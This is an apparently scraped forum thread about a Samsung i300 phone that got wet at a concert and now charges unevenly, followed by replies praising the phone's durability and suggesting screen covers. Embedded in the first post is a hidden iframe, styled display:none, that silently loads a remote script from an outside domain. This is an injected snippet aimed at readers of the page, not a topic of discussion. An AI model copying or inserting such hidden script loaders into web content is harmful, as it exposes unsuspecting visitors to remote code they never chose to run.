Did I hurt my phone? (Got a little wet)

I was a concert last weekend and stupidly had my nice new i300 and digital camera with me. Well, of course a frigin' monsoon came through and it rained and rained and rained. I was in the front row and couldn't evacuate!

I had it in my little belt holster thing and it managed to stay dry for the most part. Once the rain let up a bit I took it out and put it in a makeshift shelter. It had gotten a little wet though.

Well, after the show, I was leaving and powered it up and it seemed to work fine. I made one call and when I hung up it just froze. I couldn't do anything with it so I just pulled the battery off and let it sit until I got home. I then pressed the little reset button on the back and it works fine now except that I can't seem to get a good charge with my travel cord. It works great with my car charger but not the travel one. I don't have a craddle so I haven't been able to try that yet. (Got one on ebay the other day.) I find it really strange that it charges great with the car charger though as it seems to have the same pin-out as the travel charger.

Anyone have a clue as to what could be going on? When I plug it in to the travel charger, I get a green light that falshes red every second or so. I don't know if this is normal as I never really would have noticed it before.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

That's not normal. My Samsung car cord glows a steady color whenever it's plugged in. the travel charger changes from red to green at full charge.

Electronics don't like water. However, if you have a means to charge it, and it functions OK otherwise, you're probably in good shape. As much as people gripe about the i300 (too big, too heavy, not enough memory, etc.) it's a tough little bugger. Amazes me that the functional reliability is so much better than its predecessor, the i330. How ofter does that happen - 1st gen better then 2nd gen?

Yeah, it seems very strange. The travel charger light is green and strobes red when the phone's plugged in. Hopefully the craddle I just bought will work. Its a pain having to use the travel charger all the time.

Thumbs up Tough Phone

I have beaten the tar out of my phone. My wife spilled HOT coffee all over it by accident. I have dropped it on concrete numerous times and accidentally tossed it across a parking lot when I rushed to pull it out of my pocket. The Gray is wearing off the plastic and my styles has scratched the touch pad. I have had it for over a year and I LOVE IT! It is my brain in my pocket. I use it for everything from an alarm clock to wake me to a flash light as well as all of its normal functions. Only thing I have a problem with is that I can't find the touch pad covers.

They have the touch screen covers in ebay all the time. I've heard they also have them at some of the bigger office supply stores but I've never check. They may be getting harder to come by since they phone is slightly obsolete now.

I just buy a box of Palm III covers from Staples and cut them in half. Perfect fit and you get twice as many that way.
